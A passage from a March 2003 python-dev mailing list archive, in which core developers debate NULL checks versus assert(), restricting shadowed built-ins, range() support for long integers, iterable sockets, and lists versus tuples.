References: <20030313133609.GA23223@foof.i3.cz>
 <200303131429.h2DETem03635@odiug.zope.com>
 <007d01c2e994$ddb73c00$3c10a044@oemcomputer>
 <1047585663.4296.2.camel@slothrop.zope.com>
 <002d01c2e99d$5fd188a0$3c10a044@oemcomputer>
Message-ID: <1047587745.4296.8.camel@slothrop.zope.com>

On Thu, 2003-03-13 at 15:16, Raymond Hettinger wrote:
> > > Can we get most of the same benefit by using 
> > > an assert() rather than NULL-->SystemError?
> > 
> > No.  assert() causes the program to fail.  SystemError() raises an
> > exception and lets the program keep going.  Those are vastly different
> > effects.
> 
> Of course.  My thought was that either one will come to the
> attention of the extension writer before the extension goes out.
> But then, if the code in question never got excercised, then it
> would crash in the hands of a user.

That's right.  We should expect that some number of bugs in extension
code are going to be found by end users.  An end user is better able to
cope with a SystemError than a core file.

Long running servers have a different reason to prefer SystemError.  A
Zope process allows untrusted code to call some extension module,
believing it is safe.  A bug is found in the extension.  If the bug
tickles an assert(), Zope crashes.  If the bug raises an exception, Zope
catches it and continues.

> Raymond Hettinger
> 
> #################################################################
> #################################################################
> #################################################################
> #####
> #####
> #####
> #################################################################
> #################################################################
> #################################################################

Your funky sig is back :-).

Jeremy


From skip@pobox.com  Thu Mar 13 20:50:36 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 13 Mar 2003 14:50:36 -0600
Subject: [Python-Dev] are NULL checks in Objects/abstract.c reallyneeded?
In-Reply-To: <002d01c2e99d$5fd188a0$3c10a044@oemcomputer>
References: <20030313133609.GA23223@foof.i3.cz>
 <200303131429.h2DETem03635@odiug.zope.com>
 <007d01c2e994$ddb73c00$3c10a044@oemcomputer>
 <1047585663.4296.2.camel@slothrop.zope.com>
 <002d01c2e99d$5fd188a0$3c10a044@oemcomputer>
Message-ID: <15984.61212.224414.818876@montanaro.dyndns.org>

    Raymond> Can we get most of the same benefit by using an assert() rather
    Raymond> than NULL-->SystemError?

    Jeremy> No.  assert() causes the program to fail.  SystemError() raises
    Jeremy> an exception and lets the program keep going.  Those are vastly
    Jeremy> different effects.

It's not clear to me that you'd see any benefit anyway.  The checking code
currently looks like this:

    if (o == NULL)
        return null_error();

If you changed it to use assert you'd have

    assert(o != NULL);

which expands to

    ((o != NULL) ? 0 : __assert(...));

In the common case you still test for either o==NULL or o!=NULL.  Unless one
test is terrifically faster than the other (and you executed it a helluva
lot) you wouldn't gain anything except the loss of the possibility (however
slim) that you might be able to recover.

Still, for people who's only desire is speed and are willing to sacrifice
checks to get it, perhaps we should have a --without-null-checks configure
flag. ;-)  I bet if you were ruthless in eliminating checks (especially in
ceval.c) you would see an easily measurable speedup.

Skip


From tim.one@comcast.net  Thu Mar 13 21:20:52 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 13 Mar 2003 16:20:52 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c reallyneeded?
In-Reply-To: <15984.61212.224414.818876@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEFAEBAB.tim.one@comcast.net>

[Skip Montanaro]
> It's not clear to me that you'd see any benefit anyway.  The checking code
> currently looks like this:
>
>     if (o == NULL)
>         return null_error();
>
> If you changed it to use assert you'd have
>
>     assert(o != NULL);
>
> which expands to
>
>     ((o != NULL) ? 0 : __assert(...));
> ...

In the release build, Python arranges to #define the preprocessor NDEBUG
symbol, which in turn causes assert() to expand to nothing (or maybe to
(void)0, or something like that, depending on the compiler).  That's
standard ANSI C behavior for assert().  IOW, asserts cost nothing in a
release build -- and don't do anything in a release build either.


From greg@cosc.canterbury.ac.nz  Thu Mar 13 21:37:46 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 14 Mar 2003 10:37:46 +1300 (NZDT)
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: <200303131903.h2DJ3Ug06240@odiug.zope.com>
Message-ID: <200303132137.h2DLbkf06569@oma.cosc.canterbury.ac.nz>

Guido mused:

> and that there's no definition of range other than the built-in one
> (this requires a subtle change of language rules); it can then
> substitute an internal equivalent to xrange().

That sounds good. What sort of subtle language change
do you have in mind which would permit this deduction?

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From skip@pobox.com  Thu Mar 13 21:46:54 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 13 Mar 2003 15:46:54 -0600
Subject: [Python-Dev] are NULL checks in Objects/abstract.c reallyneeded?
In-Reply-To: <LNBBLJKPBEHFEDALKOLCOEFAEBAB.tim.one@comcast.net>
References: <15984.61212.224414.818876@montanaro.dyndns.org>
 <LNBBLJKPBEHFEDALKOLCOEFAEBAB.tim.one@comcast.net>
Message-ID: <15984.64590.983479.795437@montanaro.dyndns.org>

    Tim> In the release build, Python arranges to #define the preprocessor
    Tim> NDEBUG symbol, which in turn causes assert() to expand to nothing

Yeah, I forgot about that.  Okay, so the analysis was flawed.  You didn't
comment on the --without-null-checks option. ;-)

Skip


From guido@python.org  Fri Mar 14 00:22:09 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 19:22:09 -0500
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: "Your message of Fri, 14 Mar 2003 10:37:46 +1300."
 <200303132137.h2DLbkf06569@oma.cosc.canterbury.ac.nz>
References: <200303132137.h2DLbkf06569@oma.cosc.canterbury.ac.nz>
Message-ID: <200303140022.h2E0M9400393@pcp02138704pcs.reston01.va.comcast.net>

> > and that there's no definition of range other than the built-in one
> > (this requires a subtle change of language rules); it can then
> > substitute an internal equivalent to xrange().
> 
> That sounds good. What sort of subtle language change
> do you have in mind which would permit this deduction?

An official prohibition on inserting names in other namespaces that
shadow built-ins.  The prohibition needn't be enforced (although that
would be nice).  A program that does

  import foomod
  foomod.range = ...

would be invalid, but an implementation might not be able to catch all
cases, e.g.

  import foomod
  foomod.__dict__['range'] = ...

It could be enforced, mostly, by making a module's __dict__ attribute
return a read-only proxy like a new-style class's __dict__ attribute
does, and putting an explicit ban on setting certain names in the
module setattr implementation.  But the module itself could also play
games, e.g. it could do

  exec "range = ..." in globals()

Another module could also do

  from foomod import f # a function
  f.func_globals['range'] = ...

All these things would be illegal without necessarily being enforced.
(The only way I see for total enforcement would be to change the dict
implementation to trap certain assignments.)

BTW,

  import foomod
  foomod.foo = ...

would still be allowed -- it's only setting previously unset built-in
names (or maybe built-in names that are known to be used by the
module) that would be prohibited.

Also, foomod could explicit allow setting an attribute by doing
something like

  range = range # copy the built-in into a global

to disable the optimization.  I.e. setting something that's already
set should always be allowed.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Fri Mar 14 01:12:01 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 13 Mar 2003 20:12:01 -0500
Subject: [Python-Dev] are NULL checks in Objects/abstract.c reallyneeded?
In-Reply-To: <15984.64590.983479.795437@montanaro.dyndns.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEANEBAB.tim.one@comcast.net>

[Skip Montanaro]
> ...
> You didn't comment on the --without-null-checks option. ;-)

That's true!

agreeably y'rs  - tim


From andrewm@object-craft.com.au  Fri Mar 14 01:47:55 2003
From: andrewm@object-craft.com.au (Andrew McNamara)
Date: Fri, 14 Mar 2003 12:47:55 +1100
Subject: [Python-Dev] Iterable sockets?
Message-ID: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>

Line oriented network protocols are very common, and I often find myself
calling the socket makefile method so I can read complete lines from a
socket. I'm probably not the first one who's wished that socket objects
where more file-like.

While I don't think we'd want to go as far as to turn them into a stdio
based file object, it might make sense to allow them to be iterated over
(and add a .readline() method, I guess). This would necessitate adding some
input buffering, which will complicate things like the .recv() method, so
I'm not sure it's that good an idea, but it removes one gotchya for
neophytes (and forgetful veterans). Thoughts?

-- 
Andrew McNamara, Senior Developer, Object Craft
http://www.object-craft.com.au/


From guido@python.org  Fri Mar 14 01:57:00 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 20:57:00 -0500
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: "Your message of Fri, 14 Mar 2003 12:47:55 +1100."
 <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>
References: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>
Message-ID: <200303140157.h2E1v0i00939@pcp02138704pcs.reston01.va.comcast.net>

> Line oriented network protocols are very common, and I often find myself
> calling the socket makefile method so I can read complete lines from a
> socket. I'm probably not the first one who's wished that socket objects
> where more file-like.
> 
> While I don't think we'd want to go as far as to turn them into a stdio
> based file object, it might make sense to allow them to be iterated over
> (and add a .readline() method, I guess). This would necessitate adding some
> input buffering, which will complicate things like the .recv() method, so
> I'm not sure it's that good an idea, but it removes one gotchya for
> neophytes (and forgetful veterans). Thoughts?

Um, why doesn't the makefile() method do what you want?

--Guido van Rossum (home page: http://www.python.org/~guido/)


From andrewm@object-craft.com.au  Fri Mar 14 02:38:00 2003
From: andrewm@object-craft.com.au (Andrew McNamara)
Date: Fri, 14 Mar 2003 13:38:00 +1100
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: Message from Guido van Rossum <guido@python.org>
 of "Thu, 13 Mar 2003 20:57:00 CDT." <200303140157.h2E1v0i00939@pcp02138704pcs.reston01.va.comcast.net>
References: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>  <200303140157.h2E1v0i00939@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030314023800.7BA6D3CC5F@coffee.object-craft.com.au>

>> Line oriented network protocols are very common, and I often find myself
>> calling the socket makefile method so I can read complete lines from a
>> socket. I'm probably not the first one who's wished that socket objects
>> where more file-like.
>> 
>> While I don't think we'd want to go as far as to turn them into a stdio
>> based file object, it might make sense to allow them to be iterated over
>> (and add a .readline() method, I guess). This would necessitate adding some
>> input buffering, which will complicate things like the .recv() method, so
>> I'm not sure it's that good an idea, but it removes one gotchya for
>> neophytes (and forgetful veterans). Thoughts?
>
>Um, why doesn't the makefile() method do what you want?

The short answer is that it does, but not very tidily - by turning the
socket object into a file object, I lose the original socket object
functionality (for example, shutdown()).

At another level, the concept of a "file-like" object is a very common
python idiom - socket is the odd one out these days.

It's really not a big deal - we could regularise the interface at the
cost of more implementation complexity.

-- 
Andrew McNamara, Senior Developer, Object Craft
http://www.object-craft.com.au/


From guido@python.org  Fri Mar 14 02:53:03 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 21:53:03 -0500
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: "Your message of 13 Mar 2003 12:25:17 PST."
 <1047587117.660.33.camel@sayge.arc.nasa.gov>
References: <ur89b1bc4.fsf@boost-consulting.com>
 <20030313164247.GB22296@panix.com> <1047587117.660.33.camel@sayge.arc.nasa.gov>
Message-ID: <200303140253.h2E2r3o01163@pcp02138704pcs.reston01.va.comcast.net>

> I'm working on a patch that allows both range() and xrange() to work
> with large (PyLong) values.

I'm not interested for xrange().  As I said, xrange() is a crutch and
should not be given features that make it hard to kill.

For range(), sure, upload to SF.

> I noticed the need for a least supporting long values when I found some
> bugs in code that did things like:
> 
> a = 1/1e-5
> range( a-20, a)

This should be a TypeError.  I'm sorry it isn't.  range() is only
defined for ints, and unfortunately if you pass it a float it
truncates rather than failing.

> or
> 
> a = 1/1e-6
> b = 1/1e-5
> c = 1/1e-4
> range(a, b, c)

Ditto.

(BTW why don't you write this as 1e6, 1e5, 1e4???)

> Now, this example is hardcoded, but in graphing software, or other
> numerical work, the actual values come from the data set.  All of a
> sudden, you could be dealing with very small numbers (say, because you
> want to examine error values), and you get:
> 
> a = 1/1e-21
> b = 1/1e-20
> c = 1/1e-19
> range(a, b, c)
> 
> And your piece of code now fails.  By the comments I've seen, this
> failure tends to come as a big surprise (people are simply expecting
> range to be able to work with PyLong values, over short lengths).

But 1/1e-21 is not a long.  It's a float.  You're flirting with
disaster here.

> Also, someone who is working with large files (> C long on his machine)
> claimed to be having problems w/ xrange() failing (although, if he is
> indexing the xrange object, my patch can't help anyway)

That's a totally different problem.  Indeed you can't use xrange()
with values > sys.maxint.  But it should be easy to recode this
without xrange.

> I've seen enough people asking in the newsgroups about this behavior (at
> least four in the past 5 months or so), and I've submitted some
> application patches to make things work for these cases (ie. by
> explicitly subtracting out the large common base of each parameter, and
> adding it back in after the list is generated), so I decided to make a
> patch to change the range behavior.
> 
> Fixing range was relatively easy, and could be done with no performance
> penalty (the code to handle longs ranges is only invoked after the
> existing code path fails; the common case is unaltered).  Fixing
> xrange() is trickier, and I'm opting to maintain backwards compatibility
> as much as possible.
> 
> In any case, I should have the patch ready to submit within the next
> week or so (just a few hours more work is needed, for testing and
> cleanup)
> 
> Then the argument about whether it should ever be included can begin in
> earnest.  But I have seen enough examples of people being surprised that
> ranges of long values (where the range length is well within the
> addressable limit, but the range values must be PyLongs) that I think at
> least range() should be fixed.

Yes.

> And if range() is fixed, then sadly,
> xrange() should be fixed as well (IMO).

No.

> BTW, I'm all for deprecating xrange() with all deliberate speed.  Doing
> so would only make updating range behavior easier.

It can't be deprecated until we have an alternative.  That will have
to wait until Python 2.4.  I fought its addition to the language long
and hard, but the arguments from PBP (Practicality Beats Purity) were
too strong.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@python.org  Fri Mar 14 02:56:42 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 13 Mar 2003 21:56:42 -0500
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: "Your message of Fri, 14 Mar 2003 13:38:00 +1100."
 <20030314023800.7BA6D3CC5F@coffee.object-craft.com.au>
References: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>
 <200303140157.h2E1v0i00939@pcp02138704pcs.reston01.va.comcast.net>
 <20030314023800.7BA6D3CC5F@coffee.object-craft.com.au>
Message-ID: <200303140256.h2E2ugI01187@pcp02138704pcs.reston01.va.comcast.net>

> >> Line oriented network protocols are very common, and I often find
> >> myself calling the socket makefile method so I can read complete
> >> lines from a socket. I'm probably not the first one who's wished
> >> that socket objects where more file-like.
> >> 
> >> While I don't think we'd want to go as far as to turn them into a
> >> stdio based file object, it might make sense to allow them to be
> >> iterated over (and add a .readline() method, I guess). This would
> >> necessitate adding some input buffering, which will complicate
> >> things like the .recv() method, so I'm not sure it's that good an
> >> idea, but it removes one gotchya for neophytes (and forgetful
> >> veterans). Thoughts?
> >
> >Um, why doesn't the makefile() method do what you want?
> 
> The short answer is that it does, but not very tidily - by turning the
> socket object into a file object, I lose the original socket object
> functionality (for example, shutdown()).

You can just keep the socket around though.

> At another level, the concept of a "file-like" object is a very common
> python idiom - socket is the odd one out these days.
> 
> It's really not a big deal - we could regularise the interface at the
> cost of more implementation complexity.

I'm not sure if I'd call that regularizing.  It would by necessity
become some kind of odd mixture.  In any case, I find the file
abstraction a bit arcane too.  Maybe we should strive to replace all
these with something better in Python 3.0, to be prototyped in the
standard library starting with 2.4.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Fri Mar 14 03:03:58 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 13 Mar 2003 21:03:58 -0600
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: <20030314023800.7BA6D3CC5F@coffee.object-craft.com.au>
References: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>
 <200303140157.h2E1v0i00939@pcp02138704pcs.reston01.va.comcast.net>
 <20030314023800.7BA6D3CC5F@coffee.object-craft.com.au>
Message-ID: <15985.18078.155484.648103@montanaro.dyndns.org>

    >> Um, why doesn't the makefile() method do what you want?

    Andrew> The short answer is that it does, but not very tidily - by
    Andrew> turning the socket object into a file object, I lose the
    Andrew> original socket object functionality (for example, shutdown()).

Would it be sufficient for the close() method on the object returned by
sock.makefile() to call shutdown(2) on the underlying socket?

Skip


From andrewm@object-craft.com.au  Fri Mar 14 03:11:41 2003
From: andrewm@object-craft.com.au (Andrew McNamara)
Date: Fri, 14 Mar 2003 14:11:41 +1100
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: Message from Guido van Rossum <guido@python.org>
 of "Thu, 13 Mar 2003 21:56:42 CDT." <200303140256.h2E2ugI01187@pcp02138704pcs.reston01.va.comcast.net>
References: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au> <200303140157.h2E1v0i00939@pcp02138704pcs.reston01.va.comcast.net> <20030314023800.7BA6D3CC5F@coffee.object-craft.com.au>  <200303140256.h2E2ugI01187@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030314031141.E468A3CC5F@coffee.object-craft.com.au>

>> The short answer is that it does, but not very tidily - by turning the
>> socket object into a file object, I lose the original socket object
>> functionality (for example, shutdown()).
>
>You can just keep the socket around though.

Yes. Which has always struck me as slightly ugly.

>> At another level, the concept of a "file-like" object is a very common
>> python idiom - socket is the odd one out these days.
>> 
>> It's really not a big deal - we could regularise the interface at the
>> cost of more implementation complexity.
>
>I'm not sure if I'd call that regularizing.  It would by necessity
>become some kind of odd mixture.

I guess you would keep the send() and recv() interfaces for raw access, and
add read(), write(), readlines(), etc, which would be buffered. I'd chose
to then view it as a superset of a file-like object.

>In any case, I find the file abstraction a bit arcane too.  Maybe we
>should strive to replace all these with something better in Python 3.0, to
>be prototyped in the standard library starting with 2.4.

And get rid of stdio along the way, with any luck... 8-)

It would also be nice to make the buffering play nicely with
select()/poll()-threaded applications... if we're talking about
wishlists... 8-)

-- 
Andrew McNamara, Senior Developer, Object Craft
http://www.object-craft.com.au/


From greg@cosc.canterbury.ac.nz  Fri Mar 14 03:26:19 2003
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Fri, 14 Mar 2003 16:26:19 +1300 (NZDT)
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: <15985.18078.155484.648103@montanaro.dyndns.org>
Message-ID: <200303140326.h2E3QJZ07822@oma.cosc.canterbury.ac.nz>

Skip Montanaro <skip@pobox.com>:

> Would it be sufficient for the close() method on the object returned by
> sock.makefile() to call shutdown(2) on the underlying socket?

I don't think that would be very useful - shutdown() is
normally used to shut the socket down in one direction only.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From cnetzer@mail.arc.nasa.gov  Fri Mar 14 03:52:15 2003
From: cnetzer@mail.arc.nasa.gov (Chad Netzer)
Date: 13 Mar 2003 19:52:15 -0800
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: <200303140253.h2E2r3o01163@pcp02138704pcs.reston01.va.comcast.net>
References: <ur89b1bc4.fsf@boost-consulting.com>
 <20030313164247.GB22296@panix.com>
 <1047587117.660.33.camel@sayge.arc.nasa.gov>
 <200303140253.h2E2r3o01163@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1047613935.661.119.camel@sayge.arc.nasa.gov>

On Thu, 2003-03-13 at 18:53, Guido van Rossum wrote:

> > a = 1/1e-5
> > range( a-20, a)
> 
> This should be a TypeError.  I'm sorry it isn't.

Yeah.  I can easily make it do this, BTW.  (ie. keep it backwards
compatible for smaller floats, but disallow it when dealing with PyLong
size floats).  With large floats, the implicit conversion to PyLong gets
even less sensible, due to granularity issues.

> > a = 1/1e-6
> > b = 1/1e-5
> > c = 1/1e-4
> > range(a, b, c)
> 
> Ditto.
> 
> (BTW why don't you write this as 1e6, 1e5, 1e4???)

Just emphasizing that the coders may not have even expected to be
dealing with such "large" values, but they got them anyway because they
were plotting very "small" values (and the plotting operation did the
inversion).  A bad choice of example, I guess.

Okay, I decided to go look at the specific code I was talking about.  It
essentially did stuff like:

large_float = 1e20
a = long( math.ceil( large_float ) )
b = a + 10
range( a, b )

So, it actually wasn't submitting floats to range(), but was expecting
it to work on long values (within the limits of memory).  Again, it is
also easy to fix these uses, but we agree that in principle that it
should work...

I've heard others doing number theory work, who hoped or expected it to
work, as well.  (Typically, they wanted to use HUGE step sizes, for
example)

In any case, I'll get the patch submitted fairly soon, for range(). 
Need to update the tests.

> But 1/1e-21 is not a long.  It's a float.  You're flirting with
> disaster here.

Yep. I agree.

> > And if range() is fixed, then sadly,
> > xrange() should be fixed as well (IMO).
> 
> No.

Alright.  That makes things (fairly) easy. :)

> > BTW, I'm all for deprecating xrange() with all deliberate speed.  Doing
> > so would only make updating range behavior easier.
> 
> It can't be deprecated until we have an alternative.  That will have
> to wait until Python 2.4.

I'm also coding an irange() for consideration in the itertools module.
At least an (explicit) replacement for the iteration usage (although,
maybe not necessary if you actually do the lazy-list in "for" loop
change.)  If people need the indexing and length operations, too, I can
only suggest a pure python implementation (which could return an
irange() iterator when needed).  Is that a dead-end idea, or a starter?


Chad Netzer


From aleax@aleax.it  Fri Mar 14 07:44:12 2003
From: aleax@aleax.it (Alex Martelli)
Date: Fri, 14 Mar 2003 08:44:12 +0100
Subject: [Python-Dev] Iterable sockets?
In-Reply-To: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>
References: <20030314014755.BE3AB3CC5F@coffee.object-craft.com.au>
Message-ID: <200303140844.12401.aleax@aleax.it>

On Friday 14 March 2003 02:47 am, Andrew McNamara wrote:
> Line oriented network protocols are very common, and I often find myself
> calling the socket makefile method so I can read complete lines from a
> socket. I'm probably not the first one who's wished that socket objects
> where more file-like.
>
> While I don't think we'd want to go as far as to turn them into a stdio
> based file object, it might make sense to allow them to be iterated over
> (and add a .readline() method, I guess). This would necessitate adding some
> input buffering, which will complicate things like the .recv() method, so
> I'm not sure it's that good an idea, but it removes one gotchya for
> neophytes (and forgetful veterans). Thoughts?

I've had occasion to code a "socket that turns into a filelike object at
need" (back in Python 2.0, I believe) and I used something like (can't
find the original code, but AFAIR it was a bit like the following):


class richsocket:

    def __init__(self, sock, *args):

        self.sock = socket.socket(*args)
        self.file = None


    def __getattr__(self, name):

        try: result = getattr(self.sock, name)
        except AttributeError: pass
        else: return result

        if self.file is None: self.file = self.sock.makefile()
        return getattr(self.file, name)


This has some issues (e.g. method close goes to self.sock when it
should probably go to self.file if not None; plus, the buffering issues
you mention, etc), but nothing that looks too hard to fix -- in my use
case I applied AGNI and never needed any more than this simple
and smooth "double alternate delegation" pattern.  Today, if type
socket supports inheritance (haven't checked), it should be even 
easier, I suspect.


Alex


From aleax@aleax.it  Fri Mar 14 08:03:10 2003
From: aleax@aleax.it (Alex Martelli)
Date: Fri, 14 Mar 2003 09:03:10 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <3E70E55D.1050102@sabaydi.com>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <3E70E55D.1050102@sabaydi.com>
Message-ID: <200303140903.10045.aleax@aleax.it>

On Thursday 13 March 2003 09:09 pm, Kevin J. Butler wrote:
   ...
> The important characteristics of lists are also independent of each
> other (again, IMO on the order):
>
> - mutability of length & content - used for dynamically building
> collections 
> - heterogeneity allowed but not required - used occasionally
> for specific needs

I think some methods must also go on this list of important
characteristics -- the sort method, in particular.  If you need to
sort stuff (including heterogenous stuff, EXCEPT if the latter
includes at least one complex AND at least one other number
of any kind) you put it into a list and sort the list -- that's the
Python way of sorting, and sorting is an often-needed thing.

Sorting plays with mutability by working in-place, but for many
uses it would be just as good if sorting returned a sorted copy
instead -- the key thing here is the sorting, not the mutability.


Alex


From guido@python.org  Fri Mar 14 12:16:26 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 14 Mar 2003 07:16:26 -0500
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: "Your message of 13 Mar 2003 19:52:15 PST."
 <1047613935.661.119.camel@sayge.arc.nasa.gov>
References: <ur89b1bc4.fsf@boost-consulting.com>
 <20030313164247.GB22296@panix.com>
 <1047587117.660.33.camel@sayge.arc.nasa.gov>
 <200303140253.h2E2r3o01163@pcp02138704pcs.reston01.va.comcast.net>
 <1047613935.661.119.camel@sayge.arc.nasa.gov>
Message-ID: <200303141216.h2ECGQq02022@pcp02138704pcs.reston01.va.comcast.net>

> I've heard others doing number theory work, who hoped or expected it to
> work, as well.  (Typically, they wanted to use HUGE step sizes, for
> example)

As long as they wanted to use longs, that's fair.  E.g. now that we're
trying to get rid of the difference between ints and longs, something
like range(0, 2**100, 2**99) should really just work (and it better
give us [0, 2**99] :-).

> In any case, I'll get the patch submitted fairly soon, for range(). 
> Need to update the tests.

Thanks.  I had hoped to release beta1 before PyCon, but that's not
realistic.  But I'll work on it soon after.

> I'm also coding an irange() for consideration in the itertools module.
> At least an (explicit) replacement for the iteration usage (although,
> maybe not necessary if you actually do the lazy-list in "for" loop
> change.)  If people need the indexing and length operations, too, I can
> only suggest a pure python implementation (which could return an
> irange() iterator when needed).  Is that a dead-end idea, or a starter?

That's something for Raymond H.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From nas@python.ca  Fri Mar 14 15:28:19 2003
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 14 Mar 2003 07:28:19 -0800
Subject: [Python-Dev] More int/long integration issues
In-Reply-To: <200303140253.h2E2r3o01163@pcp02138704pcs.reston01.va.comcast.net>
References: <ur89b1bc4.fsf@boost-consulting.com> <20030313164247.GB22296@panix.com> <1047587117.660.33.camel@sayge.arc.nasa.gov> <200303140253.h2E2r3o01163@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030314152819.GA3004@glacier.arctrix.com>

Guido van Rossum wrote:
> > a = 1/1e-5
> > range( a-20, a)
> 
> This should be a TypeError.  I'm sorry it isn't.

A least it gives a DeprecationWarning now.

  Neil


From tismer@tismer.com  Fri Mar 14 15:42:10 2003
From: tismer@tismer.com (Christian Tismer)
Date: Fri, 14 Mar 2003 16:42:10 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <200303140903.10045.aleax@aleax.it>
References: <20030312164902.10494.64514.Mailman@mail.python.org> <3E70E55D.1050102@sabaydi.com> <200303140903.10045.aleax@aleax.it>
Message-ID: <3E71F851.3030802@tismer.com>

Alex Martelli wrote:
...

> Sorting plays with mutability by working in-place, but for many
> uses it would be just as good if sorting returned a sorted copy
> instead -- the key thing here is the sorting, not the mutability.

And the key assumption for sorting things is that
the things are sortable, which means there
exists and order on the basic set.
Which again suggests that list elements usually
have something in common.

ciao - chris

p.s.: I'm not using a shopping tuple, since I sort
my list be the stores I have to visit. :-)
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From tismer@tismer.com  Fri Mar 14 16:35:56 2003
From: tismer@tismer.com (Christian Tismer)
Date: Fri, 14 Mar 2003 17:35:56 +0100
Subject: [Python-Dev] PyEval_GetFrame() revisited
Message-ID: <3E7204EC.60506@tismer.com>

Hi there!

here has been this patch to the threadstate, which
allows to override the tstate's frame access.

I just saw the part of the patch that modifies
pyexpat:


       f = PyFrame_New(
                       tstate,			/*back*/
                       c,				/*code*/
!                     PyEval_GetGlobals(),	/*globals*/
                       NULL			/*locals*/

where the PyEval_GetGLobals is used instead of
		      tstate->frame->f_globals

Well, this unfortunately is not sufficient
for this module, since pyexpat still *has* direct
access to tstate->frame, in a much worse way:
pyexpat does read and write the frame variable!

In line 326, function call_with_frame, pyexpat
creates a new frame, assigns it to tstate->frame
and later on assigns f_f_back to it.

Reason why I'm thinking about this:
In order to simplify Stackless, I thought to remove
the frame variable, and let it be accessed always
via my current tasklet, which holds the frame.

Looking for the number of necessary patches, I stumbled
over PyExpat, and thought I should better keep my
hands off. Too bad.

Does it make sense to think about an API for
modifying the frame? Or are we at a dead end here?

cheers - chris
-- 
Christian Tismer             :^)   <mailto:tismer@tismer.com>
Mission Impossible 5oftware  :     Have a break! Take a ride on Python's
Johannes-Niemeyer-Weg 9a     :    *Starship* http://starship.python.net/
14109 Berlin                 :     PGP key -> http://wwwkeys.pgp.net/
work +49 30 89 09 53 34  home +49 30 802 86 56  pager +49 173 24 18 776
PGP 0x57F3BF04       9064 F4E1 D754 C2FF 1619  305B C09C 5A3B 57F3 BF04
      whom do you want to sponsor today?   http://www.stackless.com/


From just@letterror.com  Fri Mar 14 16:06:14 2003
From: just@letterror.com (Just van Rossum)
Date: Fri, 14 Mar 2003 17:06:14 +0100
Subject: [Python-Dev] Re: lists v. tuples
In-Reply-To: <3E71F851.3030802@tismer.com>
Message-ID: <r01050400-1023-0BB5B694564011D7A5D1003065D5E7E4@[10.0.0.23]>

Christian Tismer wrote:

> And the key assumption for sorting things is that
> the things are sortable, which means there
> exists and order on the basic set.
> Which again suggests that list elements usually
> have something in common.

To me it suggests that some lists are sortable and others are not...

There's one aspect about this discussion that I haven't seen mentioned
yet: syntax. I think the suggested usages of lists vs. tuples has more
to do with list vs. tuple _syntax_, and less with mutability. From this
perspective it is natural that tuples support a different set of methods
than lists. However, mutable vs. immutable has it's uses also, and from
_that_ perspective it is far less understandable that tuples lack
certain methods.

FWIW, I quite like the way how the core classes in Cocoa/NextStep are
designed. For each container-ish object there's a mutable an immutable
variant, where the mutable variant is usually a subclass of the
immutable one. Examples:
  NSString -> NSMutableString
  NSData -> NSMutableData
  NSArray -> NSMutableArray
  NSDictionary -> NSMutableDictionary

(But then again, Objective-C doesn't have syntax support for lists _or_
tuples...)

Just


From guido@python.org  Fri Mar 14 17:55:22 2003
